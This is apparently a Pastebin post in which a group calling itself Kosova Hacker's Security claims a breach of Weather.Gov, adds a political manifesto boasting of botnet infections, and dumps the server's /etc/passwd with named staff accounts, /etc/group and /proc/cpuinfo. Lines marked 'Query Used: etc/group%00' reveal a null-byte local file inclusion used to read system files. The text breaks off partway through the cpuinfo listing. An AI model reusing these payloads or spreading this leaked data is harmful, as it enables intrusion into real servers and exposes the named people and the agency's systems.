Advertisement
Guest User

Weather.Gov KHS

a guest
Oct 16th, 2012
880
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 177.07 KB | None | 0 0
  1. Weather.Gov Data leaked by Kosova Hacker's Security
  2.  
  3. Months ago in the American media write that as Americans have in the field control cybernetics Muslim country servers. We as an organization have taken the order we receive checks in some American servers as it is one of to Weather.Gov. We do not want Americans to take control servers Muslim country .We have infected computers with botnets very few organizations that deal with anti-Muslim purposes. We will soon publish the many other things the U.S. government and we will never stop year after year . This is our mission .
  4. Kosova Hacker's Security
  5. http://img577.imageshack.us/img577/70/30c8d92162864d4d9cc2d32.png
  6. http://img7.imageshack.us/img7/3247/2fddef2d32974cadb73e3aa.png
  7.  
  8. bin:x:1:1:bin:/bin:/sbin/nologin
  9. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  10. adm:x:3:4:adm:/var/adm:/sbin/nologin
  11. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  12. sync:x:5:0:sync:/sbin:/bin/sync
  13. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  14. halt:x:7:0:halt:/sbin:/sbin/halt
  15. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  16. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  17. operator:x:11:0:operator:/root:/sbin/nologin
  18. games:x:12:100:games:/usr/games:/sbin/nologin
  19. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  20. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  21. nobody:x:99:99:Nobody:/:/sbin/nologin
  22. dbus:x:81:81:System message bus:/:/sbin/nologin
  23. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  24. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  25. abrt:x:499:499::/etc/abrt:/sbin/nologin
  26. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  27. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  28. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  29. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  30. ntp:x:38:38::/etc/ntp:/sbin/nologin
  31. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  32. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  33. apache:x:48:48:Apache:/var/www:/sbin/nologin
  34. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  35. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  36. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  37. tcpdump:x:72:72::/:/sbin/nologin
  38. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  39. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  40. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  41. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  42. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  43. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  44. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  45. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  46. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  47. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  48. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  49. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  50. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  51. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  52. <b>Query Used: etc/group%00</b>root:x:0:root
  53. bin:x:1:root,bin,daemon
  54. daemon:x:2:root,bin,daemon
  55. sys:x:3:root,bin,adm
  56. adm:x:4:root,adm,daemon
  57. tty:x:5:
  58. disk:x:6:root
  59. lp:x:7:daemon,lp
  60. mem:x:8:
  61. kmem:x:9:
  62. wheel:x:10:root
  63. mail:x:12:mail,postfix
  64. uucp:x:14:uucp
  65. man:x:15:
  66. games:x:20:
  67. gopher:x:30:
  68. video:x:39:
  69. dip:x:40:
  70. ftp:x:50:
  71. lock:x:54:
  72. audio:x:63:
  73. nobody:x:99:
  74. users:x:100:
  75. dbus:x:81:
  76. utmp:x:22:
  77. utempter:x:35:
  78. floppy:x:19:
  79. vcsa:x:69:
  80. rpc:x:32:
  81. abrt:x:499:
  82. cdrom:x:11:
  83. tape:x:33:
  84. dialout:x:18:
  85. saslauth:x:498:
  86. mailnull:x:47:
  87. smmsp:x:51:
  88. haldaemon:x:68:haldaemon
  89. ntp:x:38:
  90. rpcuser:x:29:
  91. nfsnobody:x:65534:
  92. apache:x:48:
  93. webalizer:x:67:
  94. sshd:x:74:
  95. postdrop:x:90:
  96. postfix:x:89:
  97. tcpdump:x:72:
  98. slocate:x:21:
  99. stapdev:x:497:
  100. stapusr:x:496:
  101. sysadmin:x:401:cmccan,kmars,darnold,mstrydom,nscanner
  102. cmccan:x:500:
  103. darnold:x:501:
  104. kmars:x:503:
  105. zabbix:x:309:
  106. clamav:x:311:
  107. clamupdate:x:312:
  108. clam:x:308:
  109. cgred:x:504:
  110. mstrydom:x:533:
  111. forecast:x:302:
  112. ahps:x:303:
  113. nwschat:x:320:
  114. nscanner:x:424:
  115. memcached:x:301:
  116. stapsys:x:157:
  117. <b>Query Used: proc/cpuinfo%00</b>processor : 0
  118. vendor_id : GenuineIntel
  119. cpu family : 6
  120. model : 44
  121. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  122. stepping : 2
  123. cpu MHz : 2660.180
  124. cache size : 12288 KB
  125. physical id : 1
  126. siblings : 12
  127. core id : 0
  128. cpu cores : 6
  129. apicid : 32
  130. initial apicid : 32
  131. fpu : yes
  132. fpu_exception : yes
  133. cpuid level : 11
  134. wp : yes
  135. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  136. bogomips : 5320.36
  137. clflush size : 64
  138. cache_alignment : 64
  139. address sizes : 40 bits physical, 48 bits virtual
  140. power management:
  141.  
  142. processor : 1
  143. vendor_id : GenuineIntel
  144. cpu family : 6
  145. model : 44
  146. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  147. stepping : 2
  148. cpu MHz : 2660.180
  149. cache size : 12288 KB
  150. physical id : 0
  151. siblings : 12
  152. core id : 0
  153. cpu cores : 6
  154. apicid : 0
  155. initial apicid : 0
  156. fpu : yes
  157. fpu_exception : yes
  158. cpuid level : 11
  159. wp : yes
  160. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  161. bogomips : 5319.81
  162. clflush size : 64
  163. cache_alignment : 64
  164. address sizes : 40 bits physical, 48 bits virtual
  165. power management:
  166.  
  167. processor : 2
  168. vendor_id : GenuineIntel
  169. cpu family : 6
  170. model : 44
  171. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  172. stepping : 2
  173. cpu MHz : 2660.180
  174. cache size : 12288 KB
  175. physical id : 1
  176. siblings : 12
  177. core id : 1
  178. cpu cores : 6
  179. apicid : 34
  180. initial apicid : 34
  181. fpu : yes
  182. fpu_exception : yes
  183. cpuid level : 11
  184. wp : yes
  185. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  186. bogomips : 5320.36
  187. clflush size : 64
  188. cache_alignment : 64
  189. address sizes : 40 bits physical, 48 bits virtual
  190. power management:
  191.  
  192. processor : 3
  193. vendor_id : GenuineIntel
  194. cpu family : 6
  195. model : 44
  196. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  197. stepping : 2
  198. cpu MHz : 2660.180
  199. cache size : 12288 KB
  200. physical id : 0
  201. siblings : 12
  202. core id : 1
  203. cpu cores : 6
  204. apicid : 2
  205. initial apicid : 2
  206. fpu : yes
  207. fpu_exception : yes
  208. cpuid level : 11
  209. wp : yes
  210. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  211. bogomips : 5319.81
  212. clflush size : 64
  213. cache_alignment : 64
  214. address sizes : 40 bits physical, 48 bits virtual
  215. power management:
  216.  
  217. processor : 4
  218. vendor_id : GenuineIntel
  219. cpu family : 6
  220. model : 44
  221. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  222. stepping : 2
  223. cpu MHz : 2660.180
  224. cache size : 12288 KB
  225. physical id : 1
  226. siblings : 12
  227. core id : 2
  228. cpu cores : 6
  229. apicid : 36
  230. initial apicid : 36
  231. fpu : yes
  232. fpu_exception : yes
  233. cpuid level : 11
  234. wp : yes
  235. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  236. bogomips : 5320.36
  237. clflush size : 64
  238. cache_alignment : 64
  239. address sizes : 40 bits physical, 48 bits virtual
  240. power management:
  241.  
  242. processor : 5
  243. vendor_id : GenuineIntel
  244. cpu family : 6
  245. model : 44
  246. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  247. stepping : 2
  248. cpu MHz : 2660.180
  249. cache size : 12288 KB
  250. physical id : 0
  251. siblings : 12
  252. core id : 2
  253. cpu cores : 6
  254. apicid : 4
  255. initial apicid : 4
  256. fpu : yes
  257. fpu_exception : yes
  258. cpuid level : 11
  259. wp : yes
  260. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  261. bogomips : 5319.81
  262. clflush size : 64
  263. cache_alignment : 64
  264. address sizes : 40 bits physical, 48 bits virtual
  265. power management:
  266.  
  267. processor : 6
  268. vendor_id : GenuineIntel
  269. cpu family : 6
  270. model : 44
  271. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  272. stepping : 2
  273. cpu MHz : 2660.180
  274. cache size : 12288 KB
  275. physical id : 1
  276. siblings : 12
  277. core id : 8
  278. cpu cores : 6
  279. apicid : 48
  280. initial apicid : 48
  281. fpu : yes
  282. fpu_exception : yes
  283. cpuid level : 11
  284. wp : yes
  285. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  286. bogomips : 5320.36
  287. clflush size : 64
  288. cache_alignment : 64
  289. address sizes : 40 bits physical, 48 bits virtual
  290. power management:
  291.  
  292. processor : 7
  293. vendor_id : GenuineIntel
  294. cpu family : 6
  295. model : 44
  296. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  297. stepping : 2
  298. cpu MHz : 2660.180
  299. cache size : 12288 KB
  300. physical id : 0
  301. siblings : 12
  302. core id : 8
  303. cpu cores : 6
  304. apicid : 16
  305. initial apicid : 16
  306. fpu : yes
  307. fpu_exception : yes
  308. cpuid level : 11
  309. wp : yes
  310. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  311. bogomips : 5319.81
  312. clflush size : 64
  313. cache_alignment : 64
  314. address sizes : 40 bits physical, 48 bits virtual
  315. power management:
  316.  
  317. processor : 8
  318. vendor_id : GenuineIntel
  319. cpu family : 6
  320. model : 44
  321. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  322. stepping : 2
  323. cpu MHz : 2660.180
  324. cache size : 12288 KB
  325. physical id : 1
  326. siblings : 12
  327. core id : 9
  328. cpu cores : 6
  329. apicid : 50
  330. initial apicid : 50
  331. fpu : yes
  332. fpu_exception : yes
  333. cpuid level : 11
  334. wp : yes
  335. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  336. bogomips : 5320.36
  337. clflush size : 64
  338. cache_alignment : 64
  339. address sizes : 40 bits physical, 48 bits virtual
  340. power management:
  341.  
  342. processor : 9
  343. vendor_id : GenuineIntel
  344. cpu family : 6
  345. model : 44
  346. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  347. stepping : 2
  348. cpu MHz : 2660.180
  349. cache size : 12288 KB
  350. physical id : 0
  351. siblings : 12
  352. core id : 9
  353. cpu cores : 6
  354. apicid : 18
  355. initial apicid : 18
  356. fpu : yes
  357. fpu_exception : yes
  358. cpuid level : 11
  359. wp : yes
  360. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  361. bogomips : 5319.81
  362. clflush size : 64
  363. cache_alignment : 64
  364. address sizes : 40 bits physical, 48 bits virtual
  365. power management:
  366.  
  367. processor : 10
  368. vendor_id : GenuineIntel
  369. cpu family : 6
  370. model : 44
  371. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  372. stepping : 2
  373. cpu MHz : 2660.180
  374. cache size : 12288 KB
  375. physical id : 1
  376. siblings : 12
  377. core id : 10
  378. cpu cores : 6
  379. apicid : 52
  380. initial apicid : 52
  381. fpu : yes
  382. fpu_exception : yes
  383. cpuid level : 11
  384. wp : yes
  385. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  386. bogomips : 5320.36
  387. clflush size : 64
  388. cache_alignment : 64
  389. address sizes : 40 bits physical, 48 bits virtual
  390. power management:
  391.  
  392. processor : 11
  393. vendor_id : GenuineIntel
  394. cpu family : 6
  395. model : 44
  396. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  397. stepping : 2
  398. cpu MHz : 2660.180
  399. cache size : 12288 KB
  400. physical id : 0
  401. siblings : 12
  402. core id : 10
  403. cpu cores : 6
  404. apicid : 20
  405. initial apicid : 20
  406. fpu : yes
  407. fpu_exception : yes
  408. cpuid level : 11
  409. wp : yes
  410. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  411. bogomips : 5319.81
  412. clflush size : 64
  413. cache_alignment : 64
  414. address sizes : 40 bits physical, 48 bits virtual
  415. power management:
  416.  
  417. processor : 12
  418. vendor_id : GenuineIntel
  419. cpu family : 6
  420. model : 44
  421. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  422. stepping : 2
  423. cpu MHz : 2660.180
  424. cache size : 12288 KB
  425. physical id : 1
  426. siblings : 12
  427. core id : 0
  428. cpu cores : 6
  429. apicid : 33
  430. initial apicid : 33
  431. fpu : yes
  432. fpu_exception : yes
  433. cpuid level : 11
  434. wp : yes
  435. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  436. bogomips : 5320.36
  437. clflush size : 64
  438. cache_alignment : 64
  439. address sizes : 40 bits physical, 48 bits virtual
  440. power management:
  441.  
  442. processor : 13
  443. vendor_id : GenuineIntel
  444. cpu family : 6
  445. model : 44
  446. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  447. stepping : 2
  448. cpu MHz : 2660.180
  449. cache size : 12288 KB
  450. physical id : 0
  451. siblings : 12
  452. core id : 0
  453. cpu cores : 6
  454. apicid : 1
  455. initial apicid : 1
  456. fpu : yes
  457. fpu_exception : yes
  458. cpuid level : 11
  459. wp : yes
  460. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  461. bogomips : 5319.81
  462. clflush size : 64
  463. cache_alignment : 64
  464. address sizes : 40 bits physical, 48 bits virtual
  465. power management:
  466.  
  467. processor : 14
  468. vendor_id : GenuineIntel
  469. cpu family : 6
  470. model : 44
  471. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  472. stepping : 2
  473. cpu MHz : 2660.180
  474. cache size : 12288 KB
  475. physical id : 1
  476. siblings : 12
  477. core id : 1
  478. cpu cores : 6
  479. apicid : 35
  480. initial apicid : 35
  481. fpu : yes
  482. fpu_exception : yes
  483. cpuid level : 11
  484. wp : yes
  485. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  486. bogomips : 5320.36
  487. clflush size : 64
  488. cache_alignment : 64
  489. address sizes : 40 bits physical, 48 bits virtual
  490. power management:
  491.  
  492. processor : 15
  493. vendor_id : GenuineIntel
  494. cpu family : 6
  495. model : 44
  496. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  497. stepping : 2
  498. cpu MHz : 2660.180
  499. cache size : 12288 KB
  500. physical id : 0
  501. siblings : 12
  502. core id : 1
  503. cpu cores : 6
  504. apicid : 3
  505. initial apicid : 3
  506. fpu : yes
  507. fpu_exception : yes
  508. cpuid level : 11
  509. wp : yes
  510. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  511. bogomips : 5319.81
  512. clflush size : 64
  513. cache_alignment : 64
  514. address sizes : 40 bits physical, 48 bits virtual
  515. power management:
  516.  
  517. processor : 16
  518. vendor_id : GenuineIntel
  519. cpu family : 6
  520. model : 44
  521. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  522. stepping : 2
  523. cpu MHz : 2660.180
  524. cache size : 12288 KB
  525. physical id : 1
  526. siblings : 12
  527. core id : 2
  528. cpu cores : 6
  529. apicid : 37
  530. initial apicid : 37
  531. fpu : yes
  532. fpu_exception : yes
  533. cpuid level : 11
  534. wp : yes
  535. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  536. bogomips : 5320.36
  537. clflush size : 64
  538. cache_alignment : 64
  539. address sizes : 40 bits physical, 48 bits virtual
  540. power management:
  541.  
  542. processor : 17
  543. vendor_id : GenuineIntel
  544. cpu family : 6
  545. model : 44
  546. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  547. stepping : 2
  548. cpu MHz : 2660.180
  549. cache size : 12288 KB
  550. physical id : 0
  551. siblings : 12
  552. core id : 2
  553. cpu cores : 6
  554. apicid : 5
  555. initial apicid : 5
  556. fpu : yes
  557. fpu_exception : yes
  558. cpuid level : 11
  559. wp : yes
  560. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  561. bogomips : 5319.81
  562. clflush size : 64
  563. cache_alignment : 64
  564. address sizes : 40 bits physical, 48 bits virtual
  565. power management:
  566.  
  567. processor : 18
  568. vendor_id : GenuineIntel
  569. cpu family : 6
  570. model : 44
  571. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  572. stepping : 2
  573. cpu MHz : 2660.180
  574. cache size : 12288 KB
  575. physical id : 1
  576. siblings : 12
  577. core id : 8
  578. cpu cores : 6
  579. apicid : 49
  580. initial apicid : 49
  581. fpu : yes
  582. fpu_exception : yes
  583. cpuid level : 11
  584. wp : yes
  585. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  586. bogomips : 5320.36
  587. clflush size : 64
  588. cache_alignment : 64
  589. address sizes : 40 bits physical, 48 bits virtual
  590. power management:
  591.  
  592. processor : 19
  593. vendor_id : GenuineIntel
  594. cpu family : 6
  595. model : 44
  596. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  597. stepping : 2
  598. cpu MHz : 2660.180
  599. cache size : 12288 KB
  600. physical id : 0
  601. siblings : 12
  602. core id : 8
  603. cpu cores : 6
  604. apicid : 17
  605. initial apicid : 17
  606. fpu : yes
  607. fpu_exception : yes
  608. cpuid level : 11
  609. wp : yes
  610. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  611. bogomips : 5319.81
  612. clflush size : 64
  613. cache_alignment : 64
  614. address sizes : 40 bits physical, 48 bits virtual
  615. power management:
  616.  
  617. processor : 20
  618. vendor_id : GenuineIntel
  619. cpu family : 6
  620. model : 44
  621. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  622. stepping : 2
  623. cpu MHz : 2660.180
  624. cache size : 12288 KB
  625. physical id : 1
  626. siblings : 12
  627. core id : 9
  628. cpu cores : 6
  629. apicid : 51
  630. initial apicid : 51
  631. fpu : yes
  632. fpu_exception : yes
  633. cpuid level : 11
  634. wp : yes
  635. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  636. bogomips : 5320.36
  637. clflush size : 64
  638. cache_alignment : 64
  639. address sizes : 40 bits physical, 48 bits virtual
  640. power management:
  641.  
  642. processor : 21
  643. vendor_id : GenuineIntel
  644. cpu family : 6
  645. model : 44
  646. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  647. stepping : 2
  648. cpu MHz : 2660.180
  649. cache size : 12288 KB
  650. physical id : 0
  651. siblings : 12
  652. core id : 9
  653. cpu cores : 6
  654. apicid : 19
  655. initial apicid : 19
  656. fpu : yes
  657. fpu_exception : yes
  658. cpuid level : 11
  659. wp : yes
  660. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  661. bogomips : 5319.81
  662. clflush size : 64
  663. cache_alignment : 64
  664. address sizes : 40 bits physical, 48 bits virtual
  665. power management:
  666.  
  667. processor : 22
  668. vendor_id : GenuineIntel
  669. cpu family : 6
  670. model : 44
  671. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  672. stepping : 2
  673. cpu MHz : 2660.180
  674. cache size : 12288 KB
  675. physical id : 1
  676. siblings : 12
  677. core id : 10
  678. cpu cores : 6
  679. apicid : 53
  680. initial apicid : 53
  681. fpu : yes
  682. fpu_exception : yes
  683. cpuid level : 11
  684. wp : yes
